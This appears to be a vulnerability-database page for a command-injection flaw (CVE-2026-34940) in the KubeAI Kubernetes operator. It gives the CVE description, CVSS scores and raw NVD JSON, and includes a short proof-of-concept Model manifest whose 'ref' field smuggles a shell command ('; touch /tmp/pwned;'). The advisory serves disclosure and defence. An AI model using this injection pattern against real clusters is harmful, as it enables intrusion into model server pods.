Security Vulnerability Report
中文
CVE-2026-34940 CVSS 8.7 HIGH

CVE-2026-34940

Published: 2026-04-06 16:16:38
Last Modified: 2026-04-15 21:17:27
Source: [email protected]

Description

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:kubeai:kubeai:*:*:*:*:*:kubernetes:*:* - VULNERABLE
KubeAI < 0.23.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
apiVersion: kubeai.org/v1 kind: Model metadata: name: malicious-poc spec: # Attackers can inject shell commands into the 'ref' field # Example payload: ; touch /tmp/pwned; ref: "ollama://llama3; touch /tmp/pwned; #" # The resulting command executed by bash -c might look like: # ollama run ollama://llama3; touch /tmp/pwned; # ... imagePullSecrets: [] minReplicas: 1 resources: {}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34940", "sourceIdentifier": "[email protected]", "published": "2026-04-06T16:16:37.870", "lastModified": "2026-04-15T21:17:27.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kubeai:kubeai:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "0.23.2", "matchCriteriaId": "81310778-51DF-4D61-9DA1-73EAC537BDCF"}]}]}], "references": [{"url": "https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.